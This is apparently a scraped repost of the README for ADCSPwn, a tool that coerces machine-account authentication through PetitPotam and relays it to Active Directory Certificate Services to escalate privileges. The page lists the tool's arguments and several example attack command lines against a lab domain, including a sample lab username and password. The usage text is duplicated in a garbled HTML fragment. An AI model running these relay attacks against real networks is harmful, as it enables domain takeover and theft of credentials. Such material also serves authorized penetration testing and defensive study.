-->

ADCSPwn - A Tool To Escalate Privileges In An Active Directory Network By Coercing Authenticate From Machine Accounts And Relaying To The Certificate Service


A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.


Usage

Run ADCSPwn on your target network.

authentication will be relayed to. Optional arguments: port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ">
Author: @_batsec_ - MDSec ActiveBreachContributor: @Flangvik -  TrustedSecadcspwn.exe --adcs <cs server> --port [local port] --remote [computer]Required arguments:adcs            -       This is the address of the AD CS server which authentication will be relayed to.Optional arguments:port            -       The port ADCSPwn will listen on.remote          -       Remote machine to trigger authentication from.username        -       Username for non-domain context.password        -       Password for non-domain context.dc              -       Domain controller to query for Certificate Templates (LDAP).unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .output          -       Output path to store base64 generated crt.Example usage:adcspwn.exe --adcs cs.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --port 9001adcspwn.exe --adcs    cs.pwnlab.local --remote dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txtadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.localadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share


Disqus Comments